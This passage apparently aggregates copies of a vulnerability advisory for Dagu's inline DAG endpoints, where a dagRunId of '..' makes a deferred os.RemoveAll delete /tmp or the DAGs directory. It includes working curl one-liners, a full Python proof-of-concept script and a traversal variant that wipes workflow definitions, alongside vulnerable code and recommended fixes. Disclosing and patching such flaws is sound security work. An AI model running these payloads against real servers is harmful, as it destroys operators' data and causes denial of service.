`os.RemoveAll(\"/home/dagu/dags\")`, deleting the entire DAGs directory. The exact path depends on the deployment but can be inferred from error messages or default paths.\n\n\n## 7. Impact\n\n**Denial of Service (primary)**\n\nOn every deployment, an authenticated operator can send one request to trigger `os.RemoveAll` on a directory outside the intended temp subdirectory. With `dagRunId=\"..\"`, the target is `/tmp`. On a non-root deployment with Linux sticky bit semantics, all temp files in `/tmp` created by the dagu user are deleted. Any running dagu workflow that depends on temp files in progress is interrupted. The attack can be repeated continuously with no rate limiting, preventing recovery.\n\nOn Docker-based deployments where dagu runs as root inside a container (a common pattern for dagu installations), `os.RemoveAll(\"/tmp\")` removes all contents of `/tmp` inside the container. This affects every process in the container that uses `/tmp`, including shared libraries unpacked at runtime, unix sockets, and lock files.\n\n**Arbitrary file write (secondary)**\n\nThe spec YAML content provided by the attacker is written to `filepath.Join(tmpDir, nameHint+\".yaml\")` where both `tmpDir` and `nameHint` can be influenced. If the attacker knows or can guess the path of a directory writable by the dagu process (for example, the DAGs directory), they can write arbitrary YAML content there. Because `spec.Load` reads from that path and executes the spec, this also provides a mechanism for persisting a workflow definition containing attacker-controlled commands in the DAGs directory before the cleanup removes it.\n\n**Deletion of the DAGs directory (combined)**\n\nThe combination of the file write and the cleanup allows an authenticated operator to permanently delete the entire DAGs directory in a single request by pointing `dagRunId` at that path. This destroys all workflow definitions for all users of the dagu instance.\n\n\n## 8. 
Affected Versions\n\nThe `loadInlineDAG` function and both calling handlers (`ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`) are present in the current `main` branch. The vulnerability has existed since these endpoints were introduced. No fix is present as of the review date of 2026-02-24.\n\nAuthentication requirements differ by version:\n- Versions 1.30.3 and earlier: default `auth.mode` was `none`, so this is exploitable without credentials\n- Versions after 1.30.3: default `auth.mode` is `builtin`, so operator-level credentials are required\n\n\n## 9. Recommended Fix\n\nValidate `dagRunID` before use in `loadInlineDAG`. The OpenAPI schema already defines the correct pattern. Enforce it at the application layer:\n\n```go\n// Add at the start of loadInlineDAG, before filepath.Join:\nvar validDAGRunID = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)\n\nif dagRunID != \"\" && !validDAGRunID.MatchString(dagRunID) {\n    return nil, func() {}, &Error{\n        HTTPStatus: http.StatusBadRequest,\n        Code:       api.ErrorCodeBadRequest,\n        Message:    \"dagRunId contains invalid characters\",\n    }\n}\n```\n\nAs a defense-in-depth measure, verify that the resolved `tmpDir` is actually inside the expected base after joining:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\nexpectedBase := filepath.Join(os.TempDir(), nameHint)\nif !strings.HasPrefix(tmpDir+string(filepath.Separator), expectedBase+string(filepath.Separator)) {\n    return nil, func() {}, &Error{\n        HTTPStatus: http.StatusBadRequest,\n        Code:       api.ErrorCodeBadRequest,\n        Message:    \"dagRunId resolves outside the permitted temp directory\",\n    }\n}\n```\n\nNote that this prefix check still accepts a `dagRunID` that resolves to `expectedBase` itself (for example `.`), in which case the deferred `os.RemoveAll` would target the shared `<name>` directory rather than a per-run subdirectory; it complements the pattern check above and does not replace it. Because `expectedBase` is built from `nameHint`, which section 7 notes can also be influenced by the request, `nameHint` needs equivalent validation for the containment check to be meaningful.\n\nThe fix must cover both `ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`; since both call `loadInlineDAG`, validating inside that function protects both handlers. Additionally, enabling `StrictValidation: true` as the default configuration would provide an extra layer of enforcement at the API boundary.",
                    "title": "github - https://github.com/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "description",
                    "text": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as \"..\" to redirect the computed directory outside the intended /tmp/<name>/<id> path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to \"..\", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll(\"/tmp\") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.",
                    "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-31886"
                },
                {
                    "category": "description",
                    "text": "Dagu is a workflow engine with a built-in Web user interface. Prior to 2.2.4, the dagRunId request field accepted by the inline DAG execution endpoints is passed directly into filepath.Join to construct a temporary directory path without any format validation. Go's filepath.Join resolves .. segments lexically, so a caller can supply a value such as \"..\" to redirect the computed directory outside the intended /tmp/<name>/<id> path. A deferred cleanup function that calls os.RemoveAll on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to. With dagRunId set to \"..\", the resolved directory is the system temporary directory (/tmp on Linux). On non-root deployments, os.RemoveAll(\"/tmp\") removes all files in /tmp owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of /tmp, causing a system-wide denial of service. This vulnerability is fixed in 2.2.4.",
                    "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-31886"
                },
                {
                    "category": "description",
                    "text": "## 1. Vulnerability Summary\n\nThe `dagRunId` request field accepted by the inline DAG execution endpoints is passed directly into `filepath.Join` to construct a temporary directory path without any format validation. Go's `filepath.Join` resolves `..` segments lexically, so a caller can supply a value such as `\"..\"` to redirect the computed directory outside the intended `/tmp/<name>/<id>` path. A deferred cleanup function that calls `os.RemoveAll` on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to.\n\nWith `dagRunId` set to `\"..\"`, the resolved directory is the system temporary directory (`/tmp` on Linux). On non-root deployments, `os.RemoveAll(\"/tmp\")` removes all files in `/tmp` owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of `/tmp`, causing a system-wide denial of service.\n\n\n## 2. This Is Not a Duplicate of Existing Advisories\n\nTwo security advisories are already published for dagu. This vulnerability is distinct from both.\n\n**GHSA-6qr9-g2xw-cw92** fixed the fact that the default authentication mode was `none`, allowing unauthenticated access to the inline execution endpoint. That advisory covers authentication bypass. The `dagRunId` path traversal described here is a separate input-validation flaw in `loadInlineDAG()` that exists regardless of whether authentication is required and was not addressed by that fix.\n\n**CVE-2026-27598** fixed a path traversal in the DAG creation endpoint (`POST /api/v1/dags`) via the `name` field. The fix added `filepath.Base()` and a base-directory prefix check inside `generateFilePath()`. That fix applies only to `generateFilePath()` in `dags.go`. The function `loadInlineDAG()` in `dagruns.go` has no equivalent guard on its `dagRunID` argument and was not part of that patch.\n\n\n## 3. 
Vulnerable Code\n\n**File**: `internal/service/frontend/api/v1/dagruns.go`\n\nThe `loadInlineDAG` function (lines 202-267) constructs the temp directory at line 234:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n```\n\n`dagRunID` is user-supplied. No validation of the value occurs before this line. The cleanup closure is then registered:\n\n```go\ncleanup := func() {\n    _ = os.RemoveAll(tmpDir)\n}\n```\n\nIn `ExecuteDAGRunFromSpec` (lines 52-119), the cleanup is deferred unconditionally:\n\n```go\ndag, cleanup, err := a.loadInlineDAG(ctx, request.Body.Spec, request.Body.Name, dagRunId)\nif err != nil {\n    return nil, err\n}\ndefer cleanup()  // registered after loadInlineDAG succeeds; fires on all subsequent return paths\n```\n\nThe same pattern appears in `EnqueueDAGRunFromSpec` (lines 122-200), line 160:\n\n```go\ndefer cleanup()\n```\n\n**Why the OpenAPI schema pattern does not prevent this:**\n\nThe `DAGRunId` schema in `api/v1/api.yaml` (line 5738) declares:\n\n```yaml\npattern: \"^[a-zA-Z0-9_-]+$\"\n```\n\nThis pattern excludes `.` and `/`, which would block path traversal values. However, enforcement of that pattern depends on the OpenAPI validator middleware, which is only activated when `StrictValidation` is `true`. That setting is defined in `internal/cmn/config/config.go`:\n\n```go\nStrictValidation  bool\n```\n\nIt is not present in the `Definition` struct (`definition.go`) and carries no `mapstructure` tag, which means viper/mapstructure can never populate it from a YAML configuration file; it therefore cannot be set in the config loader (`loader.go`) and its value is always the Go zero value for `bool`, which is `false`. The loader test at line 165 of `loader_test.go` confirms that `StrictValidation` is `false` even after loading a comprehensive configuration file that exercises every configurable option — because there is no mechanism by which it could ever be `true`. 
The validator middleware is never registered for any standard dagu deployment.\n\nThe file `dagruns.go` defines a `sanitizeFilename` helper at line 36 that replaces characters outside `[a-zA-Z0-9._-]` with underscores. This function is called when constructing log filenames (lines 422, 566, 1127, and 1211) and is never applied to `dagRunID` before the `filepath.Join` call. No validation or sanitization of `dagRunID` for path separator characters exists anywhere in the request-to-`filepath.Join` pipeline.\n\n\n## 4. Attack Conditions\n\n- The attacker must be authenticated with a role of `operator`, `developer`, `manager`, or `admin` (any role for which `CanExecute()` returns true).\n- The server permission `PermissionRunDAGs` must be enabled. This is the default (`true` as set in `loader.go` lines 353-356).\n- On dagu versions 1.30.3 and earlier, where the default authentication mode was `none`, no authentication is required at all.\n\n\n## 5. Attack Scenario\n\n### Step 1: Authenticate\n\n```bash\nTOKEN=$(curl -s -X POST http://TARGET:8080/api/v1/auth/login \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"operator\",\"password\":\"<password>\"}' \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)['token'])\")\n```\n\nFor versions with `auth.mode: none`, authentication is not required and the `Authorization` header can be omitted.\n\n### Step 2: Send the malicious request\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '{\n    \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n    \"dagRunId\": \"..\"\n  }'\n```\n\n### Step 3: What happens inside the server\n\n1. `request.Body.DagRunId` is `\"..\"`. This value is copied to `dagRunId` at line 72 without modification.\n\n2. `loadInlineDAG` is called with `dagRunID = \"..\"` and no `name` parameter, so `nameHint = \"inline\"`. 
Because `name` is nil, the `else` branch at lines 214-231 runs first: `spec.LoadYAML` parses the spec content and `dag.Validate()` checks its structure. This pre-validation operates entirely on the YAML content; it has no knowledge of `dagRunID`. The exploit spec (`steps:\\n  - name: s\\n    command: id\\n`) passes this check. The `nameHint` variable is not updated by this parse — it stays `\"inline\"` regardless of any `name` field inside the spec YAML. Control reaches line 234 only after the spec is accepted.\n\n3. Line 234 executes:\n   ```\n   tmpDir = filepath.Join(\"/tmp\", \"inline\", \"..\")\n           = filepath.Clean(\"/tmp/inline/..\")\n           = \"/tmp\"\n   ```\n   (`filepath.Join` calls `filepath.Clean` on the joined result, resolving `..` lexically.)\n\n4. `os.MkdirAll(\"/tmp\", 0o750)` succeeds because `/tmp` already exists.\n\n5. The cleanup closure captures `tmpDir = \"/tmp\"`:\n   ```go\n   cleanup = func() { os.RemoveAll(\"/tmp\") }\n   ```\n\n6. The spec is written to `filepath.Join(\"/tmp\", \"inline.yaml\")` = `/tmp/inline.yaml` and loaded via `spec.Load` (line 256). The load succeeds.\n\n7. `loadInlineDAG` returns `dag, cleanup, nil`.\n\n8. `defer cleanup()` is registered in `ExecuteDAGRunFromSpec`.\n\n9. The handler builds the 200 response object. In Go, deferred functions execute during the function's return sequence — before control returns to chi's server wrapper. The deferred cleanup therefore fires first: `os.RemoveAll(\"/tmp\")` runs and removes the target directory.\n\n10. The handler returns the response object to chi. Chi serializes it and sends the HTTP 200 to the client. The 200 is delivered successfully because the response content was already constructed before the defer ran; the directory deletion does not affect the HTTP response.\n\n### Step 4: Result\n\nOn non-root deployments: all files in `/tmp` owned by the dagu process user are removed (Linux sticky bit prevents deletion of files owned by other users). 
Any concurrent dagu runs that have live temp files in `/tmp` lose those files and fail.\n\nOn root or Docker deployments (where dagu runs as root inside a container, which is a common production pattern): all contents of `/tmp` are removed, affecting every process on the system that uses `/tmp` for temporary storage.\n\nThe attack can be sent repeatedly without any cooldown, maintaining the denial-of-service condition.\n\n\n## 6. Proof of Concept\n\n### One-liner (against auth-mode-none instance)\n\n```bash\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Automated PoC script\n\nSave as `poc.py` and run with `python3 poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: dagu dagRunId path traversal\nAffected: POST /api/v1/dag-runs  (executeDAGRunFromSpec)\n          POST /api/v1/dag-runs/enqueue  (enqueueDAGRunFromSpec)\n\nVulnerable line: dagruns.go:234\n  tmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n\nUsage:\n  python3 poc.py --url http://localhost:8080\n  python3 poc.py --url http://localhost:8080 --username admin --password secret\n  python3 poc.py --url http://localhost:8080 --token eyJ...\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n\ndef login(base_url, username, password):\n    payload = json.dumps({\"username\": username, \"password\": password}).encode()\n    req = urllib.request.Request(\n        f\"{base_url}/api/v1/auth/login\",\n        data=payload,\n        headers={\"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    try:\n        with urllib.request.urlopen(req, timeout=10) as resp:\n            data = json.loads(resp.read())\n            token = data.get(\"token\") or data.get(\"accessToken\")\n            if not token:\n                print(f\"Login response did 
not contain a token: {data}\")\n                sys.exit(1)\n            return token\n    except urllib.error.HTTPError as e:\n        print(f\"Login failed (HTTP {e.code}): {e.read().decode()}\")\n        sys.exit(1)\n\n\ndef send_exploit(base_url, token, traversal):\n    body = json.dumps({\n        \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n        \"dagRunId\": traversal,\n    }).encode()\n    headers = {\"Content-Type\": \"application/json\"}\n    if token:\n        headers[\"Authorization\"] = f\"Bearer {token}\"\n    req = urllib.request.Request(\n        f\"{base_url}/api/v1/dag-runs\",\n        data=body,\n        headers=headers,\n        method=\"POST\",\n    )\n    try:\n        with urllib.request.urlopen(req, timeout=15) as resp:\n            return resp.status, json.loads(resp.read())\n    except urllib.error.HTTPError as e:\n        return e.code, e.read().decode()\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--url\", default=\"http://localhost:8080\")\n    parser.add_argument(\"--token\", default=\"\")\n    parser.add_argument(\"--username\", default=\"admin\")\n    parser.add_argument(\"--password\", default=\"\")\n    parser.add_argument(\"--traversal\", default=\"..\",\n                        help=\"Value for dagRunId (default: '..')\")\n    args = parser.parse_args()\n\n    base_url = args.url.rstrip(\"/\")\n    traversal = args.traversal\n\n    import posixpath\n    name_hint = \"inline\"\n    expected_dir = posixpath.normpath(f\"/tmp/{name_hint}/{traversal}\")\n    print(f\"Target server : {base_url}\")\n    print(f\"dagRunId value: {repr(traversal)}\")\n    print(f\"Resolved tmpDir (Linux): filepath.Join('/tmp', '{name_hint}', '{traversal}') = '{expected_dir}'\")\n    print(f\"os.RemoveAll will target: '{expected_dir}'\")\n    print()\n\n    token = args.token\n    if not token and args.password:\n        print(\"Obtaining JWT token...\")\n        token = login(base_url, args.username, 
args.password)\n        print(f\"Token obtained: {token[:30]}...\")\n    elif not token:\n        print(\"No token provided. Proceeding without authentication (requires auth.mode: none).\")\n    print()\n\n    tmp_before = os.path.exists(expected_dir) if os.path.isabs(expected_dir) else None\n    if tmp_before is not None:\n        print(f\"'{expected_dir}' exists before request: {tmp_before}\")\n\n    print(f\"Sending request to {base_url}/api/v1/dag-runs ...\")\n    status, body = send_exploit(base_url, token, traversal)\n    print(f\"HTTP {status}: {body}\")\n    print()\n\n    if status not in (200, 201):\n        print(f\"Unexpected status {status}. Check credentials or server configuration.\")\n        sys.exit(1)\n\n    time.sleep(0.5)\n\n    if tmp_before is not None:\n        tmp_after = os.path.exists(expected_dir)\n        print(f\"'{expected_dir}' exists after request: {tmp_after}\")\n        if not tmp_after:\n            print()\n            print(\"CONFIRMED: path traversal caused os.RemoveAll to delete the target directory.\")\n        else:\n            print()\n            print(\"Directory still exists. 
If running against a remote server, check\")\n            print(f\"on the server host whether '{expected_dir}' was modified.\")\n    else:\n        print(f\"Cannot verify filesystem state from this host.\")\n        print(f\"On the server, check whether '{expected_dir}' was modified after the request.\")\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\n### Local test setup (no existing dagu installation needed)\n\n```bash\n# Download the latest dagu binary\ncurl -L https://github.com/dagu-org/dagu/releases/latest/download/dagu_linux_amd64.tar.gz \\\n  | tar -xz\n\n# Start with no authentication for simplest reproduction\ncat > /tmp/dagu-test.yaml <<'EOF'\nauth:\n  mode: none\nEOF\n\n./dagu server --config /tmp/dagu-test.yaml &\nSERVER_PID=$!\nsleep 2\n\n# Confirm /tmp is accessible\necho \"Files in /tmp before: $(ls /tmp | wc -l)\"\n\n# Run the exploit\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n\nsleep 1\n\n# Check whether dagu-owned temp files were deleted\necho \"Files in /tmp after:  $(ls /tmp | wc -l)\"\n\nkill $SERVER_PID\n```\n\n### Variant: target the enqueue endpoint\n\nBoth endpoints are affected via the same `loadInlineDAG` call:\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs/enqueue \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Variant: file write outside /tmp\n\nWith a `dagRunId` value that traverses to a known writable directory, the spec content is written there as `<nameHint>.yaml` before the cleanup removes that directory:\n\n```json\n{\n  \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n  \"name\": \"payload\",\n  \"dagRunId\": \"../../home/dagu/dags\"\n}\n```\n\nThis writes `/home/dagu/dags/payload.yaml`, executes it, then calls 
`os.RemoveAll(\"/home/dagu/dags\")`, deleting the entire DAGs directory. The exact path depends on the deployment but can be inferred from error messages or default paths.\n\n\n## 7. Impact\n\n**Denial of Service (primary)**\n\nOn every deployment, an authenticated operator can send one request to trigger `os.RemoveAll` on a directory outside the intended temp subdirectory. With `dagRunId=\"..\"`, the target is `/tmp`. On a non-root deployment with Linux sticky bit semantics, all temp files in `/tmp` created by the dagu user are deleted. Any running dagu workflow that depends on temp files in progress is interrupted. The attack can be repeated continuously with no rate limiting, preventing recovery.\n\nOn Docker-based deployments where dagu runs as root inside a container (a common pattern for dagu installations), `os.RemoveAll(\"/tmp\")` removes all contents of `/tmp` inside the container. This affects every process in the container that uses `/tmp`, including shared libraries unpacked at runtime, unix sockets, and lock files.\n\n**Arbitrary file write (secondary)**\n\nThe spec YAML content provided by the attacker is written to `filepath.Join(tmpDir, nameHint+\".yaml\")` where both `tmpDir` and `nameHint` can be influenced. If the attacker knows or can guess the path of a directory writable by the dagu process (for example, the DAGs directory), they can write arbitrary YAML content there. Because `spec.Load` reads from that path and executes the spec, this also provides a mechanism for persisting a workflow definition containing attacker-controlled commands in the DAGs directory before the cleanup removes it.\n\n**Deletion of the DAGs directory (combined)**\n\nThe combination of the file write and the cleanup allows an authenticated operator to permanently delete the entire DAGs directory in a single request by pointing `dagRunId` at that path. This destroys all workflow definitions for all users of the dagu instance.\n\n\n## 8. 
Affected Versions\n\nThe `loadInlineDAG` function and both calling handlers (`ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`) are present in the current `main` branch. The vulnerability has existed since these endpoints were introduced. No fix is present as of the review date of 2026-02-24.\n\nAuthentication requirements differ by version:\n- Versions 1.30.3 and earlier: default `auth.mode` was `none`, so this is exploitable without credentials\n- Versions after 1.30.3: default `auth.mode` is `builtin`, so operator-level credentials are required\n\n\n## 9. Recommended Fix\n\nValidate `dagRunID` before use in `loadInlineDAG`. The OpenAPI schema already defines the correct pattern. Enforce it at the application layer:\n\n```go\n// Add at the start of loadInlineDAG, before filepath.Join:\nvar validDAGRunID = regexp.MustCompile(`^[a-zA-Z0-9_-]+$`)\n\nif dagRunID != \"\" && !validDAGRunID.MatchString(dagRunID) {\n    return nil, func() {}, &Error{\n        HTTPStatus: http.StatusBadRequest,\n        Code:       api.ErrorCodeBadRequest,\n        Message:    \"dagRunId contains invalid characters\",\n    }\n}\n```\n\nAs a defense-in-depth measure, verify that the resolved `tmpDir` is actually inside the expected base after joining:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\nexpectedBase := filepath.Join(os.TempDir(), nameHint)\nif !strings.HasPrefix(tmpDir+string(filepath.Separator), expectedBase+string(filepath.Separator)) {\n    return nil, func() {}, &Error{\n        HTTPStatus: http.StatusBadRequest,\n        Code:       api.ErrorCodeBadRequest,\n        Message:    \"dagRunId resolves outside the permitted temp directory\",\n    }\n}\n```\n\nNote that this prefix comparison is lexical and also passes when `tmpDir` equals `expectedBase`; if an empty `dagRunID` can reach this point (the pattern check above skips empty values), the deferred `os.RemoveAll` would then remove the shared `<nameHint>` directory, so an empty value should be rejected or replaced with a generated ID before the join.\n\nThe same fix must be applied to both `ExecuteDAGRunFromSpec` and `EnqueueDAGRunFromSpec`. Additionally, enabling `StrictValidation: true` as the default configuration would provide an extra layer of enforcement at the API boundary.",
                    "title": "github - https://api.github.com/advisories/GHSA-m4q3-457p-hh2x"
                },
                {
                    "category": "description",
                    "text": "## 1. Vulnerability Summary\n\nThe `dagRunId` request field accepted by the inline DAG execution endpoints is passed directly into `filepath.Join` to construct a temporary directory path without any format validation. Go's `filepath.Join` resolves `..` segments lexically, so a caller can supply a value such as `\"..\"` to redirect the computed directory outside the intended `/tmp/<name>/<id>` path. A deferred cleanup function that calls `os.RemoveAll` on that directory then runs unconditionally when the HTTP handler returns, deleting whatever directory the traversal resolved to.\n\nWith `dagRunId` set to `\"..\"`, the resolved directory is the system temporary directory (`/tmp` on Linux). On non-root deployments, `os.RemoveAll(\"/tmp\")` removes all files in `/tmp` owned by the dagu process user, disrupting every concurrent dagu run that has live temp files. On root or Docker deployments, the call removes the entire contents of `/tmp`, causing a system-wide denial of service.\n\n\n## 2. This Is Not a Duplicate of Existing Advisories\n\nTwo security advisories are already published for dagu. This vulnerability is distinct from both.\n\n**GHSA-6qr9-g2xw-cw92** fixed the fact that the default authentication mode was `none`, allowing unauthenticated access to the inline execution endpoint. That advisory covers authentication bypass. The `dagRunId` path traversal described here is a separate input-validation flaw in `loadInlineDAG()` that exists regardless of whether authentication is required and was not addressed by that fix.\n\n**CVE-2026-27598** fixed a path traversal in the DAG creation endpoint (`POST /api/v1/dags`) via the `name` field. The fix added `filepath.Base()` and a base-directory prefix check inside `generateFilePath()`. That fix applies only to `generateFilePath()` in `dags.go`. The function `loadInlineDAG()` in `dagruns.go` has no equivalent guard on its `dagRunID` argument and was not part of that patch.\n\n\n## 3. 
Vulnerable Code\n\n**File**: `internal/service/frontend/api/v1/dagruns.go`\n\nThe `loadInlineDAG` function (lines 202-267) constructs the temp directory at line 234:\n\n```go\ntmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n```\n\n`dagRunID` is user-supplied. No validation of the value occurs before this line. The cleanup closure is then registered:\n\n```go\ncleanup := func() {\n    _ = os.RemoveAll(tmpDir)\n}\n```\n\nIn `ExecuteDAGRunFromSpec` (lines 52-119), the cleanup is deferred unconditionally:\n\n```go\ndag, cleanup, err := a.loadInlineDAG(ctx, request.Body.Spec, request.Body.Name, dagRunId)\nif err != nil {\n    return nil, err\n}\ndefer cleanup()  // registered after loadInlineDAG succeeds; fires on all subsequent return paths\n```\n\nThe same pattern appears in `EnqueueDAGRunFromSpec` (lines 122-200), line 160:\n\n```go\ndefer cleanup()\n```\n\n**Why the OpenAPI schema pattern does not prevent this:**\n\nThe `DAGRunId` schema in `api/v1/api.yaml` (line 5738) declares:\n\n```yaml\npattern: \"^[a-zA-Z0-9_-]+$\"\n```\n\nThis pattern excludes `.` and `/`, which would block path traversal values. However, enforcement of that pattern depends on the OpenAPI validator middleware, which is only activated when `StrictValidation` is `true`. That setting is defined in `internal/cmn/config/config.go`:\n\n```go\nStrictValidation  bool\n```\n\nIt is not present in the `Definition` struct (`definition.go`) and carries no `mapstructure` tag, which means viper/mapstructure can never populate it from a YAML configuration file; it therefore cannot be set in the config loader (`loader.go`) and its value is always the Go zero value for `bool`, which is `false`. The loader test at line 165 of `loader_test.go` confirms that `StrictValidation` is `false` even after loading a comprehensive configuration file that exercises every configurable option — because there is no mechanism by which it could ever be `true`. 
The validator middleware is never registered for any standard dagu deployment.\n\nThe file `dagruns.go` defines a `sanitizeFilename` helper at line 36 that replaces characters outside `[a-zA-Z0-9._-]` with underscores. This function is called when constructing log filenames (lines 422, 566, 1127, and 1211) and is never applied to `dagRunID` before the `filepath.Join` call. No validation or sanitization of `dagRunID` for path separator characters exists anywhere in the request-to-`filepath.Join` pipeline.\n\n\n## 4. Attack Conditions\n\n- The attacker must be authenticated with a role of `operator`, `developer`, `manager`, or `admin` (any role for which `CanExecute()` returns true).\n- The server permission `PermissionRunDAGs` must be enabled. This is the default (`true` as set in `loader.go` lines 353-356).\n- On dagu versions 1.30.3 and earlier, where the default authentication mode was `none`, no authentication is required at all.\n\n\n## 5. Attack Scenario\n\n### Step 1: Authenticate\n\n```bash\nTOKEN=$(curl -s -X POST http://TARGET:8080/api/v1/auth/login \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"username\":\"operator\",\"password\":\"<password>\"}' \\\n  | python3 -c \"import sys,json; print(json.load(sys.stdin)['token'])\")\n```\n\nFor versions with `auth.mode: none`, authentication is not required and the `Authorization` header can be omitted.\n\n### Step 2: Send the malicious request\n\n```bash\ncurl -s -X POST http://TARGET:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -H \"Authorization: Bearer $TOKEN\" \\\n  -d '{\n    \"spec\": \"steps:\\n  - name: s\\n    command: id\\n\",\n    \"dagRunId\": \"..\"\n  }'\n```\n\n### Step 3: What happens inside the server\n\n1. `request.Body.DagRunId` is `\"..\"`. This value is copied to `dagRunId` at line 72 without modification.\n\n2. `loadInlineDAG` is called with `dagRunID = \"..\"` and no `name` parameter, so `nameHint = \"inline\"`. 
Because `name` is nil, the `else` branch at lines 214-231 runs first: `spec.LoadYAML` parses the spec content and `dag.Validate()` checks its structure. This pre-validation operates entirely on the YAML content; it has no knowledge of `dagRunID`. The exploit spec (`steps:\\n  - name: s\\n    command: id\\n`) passes this check. The `nameHint` variable is not updated by this parse — it stays `\"inline\"` regardless of any `name` field inside the spec YAML. Control reaches line 234 only after the spec is accepted.\n\n3. Line 234 executes:\n   ```\n   tmpDir = filepath.Join(\"/tmp\", \"inline\", \"..\")\n           = filepath.Clean(\"/tmp/inline/..\")\n           = \"/tmp\"\n   ```\n   (`filepath.Join` calls `filepath.Clean` on the joined result, resolving `..` lexically.)\n\n4. `os.MkdirAll(\"/tmp\", 0o750)` succeeds because `/tmp` already exists.\n\n5. The cleanup closure captures `tmpDir = \"/tmp\"`:\n   ```go\n   cleanup = func() { os.RemoveAll(\"/tmp\") }\n   ```\n\n6. The spec is written to `filepath.Join(\"/tmp\", \"inline.yaml\")` = `/tmp/inline.yaml` and loaded via `spec.Load` (line 256). The load succeeds.\n\n7. `loadInlineDAG` returns `dag, cleanup, nil`.\n\n8. `defer cleanup()` is registered in `ExecuteDAGRunFromSpec`.\n\n9. The handler builds the 200 response object. In Go, deferred functions execute during the function's return sequence — before control returns to chi's server wrapper. The deferred cleanup therefore fires first: `os.RemoveAll(\"/tmp\")` runs and removes the target directory.\n\n10. The handler returns the response object to chi. Chi serializes it and sends the HTTP 200 to the client. The 200 is delivered successfully because the response content was already constructed before the defer ran; the directory deletion does not affect the HTTP response.\n\n### Step 4: Result\n\nOn non-root deployments: all files in `/tmp` owned by the dagu process user are removed (Linux sticky bit prevents deletion of files owned by other users). 
Any concurrent dagu runs that have live temp files in `/tmp` lose those files and fail.\n\nOn root or Docker deployments (where dagu runs as root inside a container, which is a common production pattern): all contents of `/tmp` are removed, affecting every process on the system that uses `/tmp` for temporary storage.\n\nThe attack can be sent repeatedly without any cooldown, maintaining the denial-of-service condition.\n\n\n## 6. Proof of Concept\n\n### One-liner (against auth-mode-none instance)\n\n```bash\ncurl -s -X POST http://localhost:8080/api/v1/dag-runs \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"spec\":\"steps:\\n  - name: s\\n    command: id\\n\",\"dagRunId\":\"..\"}'\n```\n\n### Automated PoC script\n\nSave as `poc.py` and run with `python3 poc.py`:\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nProof of Concept: dagu dagRunId path traversal\nAffected: POST /api/v1/dag-runs  (executeDAGRunFromSpec)\n          POST /api/v1/dag-runs/enqueue  (enqueueDAGRunFromSpec)\n\nVulnerable line: dagruns.go:234\n  tmpDir := filepath.Join(os.TempDir(), nameHint, dagRunID)\n\nUsage:\n  python3 poc.py --url http://localhost:8080\n  python3 poc.py --url http://localhost:8080 --username admin --password secret\n  python3 poc.py --url http://localhost:8080 --token eyJ...\n\"\"\"\n\nimport argparse\nimport json\nimport os\nimport sys\nimport time\nimport urllib.request\nimport urllib.error\n\n\ndef login(base_url, username, password):\n    payload = json.dumps({\"username\": username, \"password\": password}).encode()\n    req = urllib.request.Request(\n        f\"{base_url}/api/v1/auth/login\",\n        data=payload,\n        headers={\"Content-Type\": \"application/json\"},\n        method=\"POST\",\n    )\n    try:\n        with urllib.request.urlopen(req, timeout=10) as resp:\n            data = 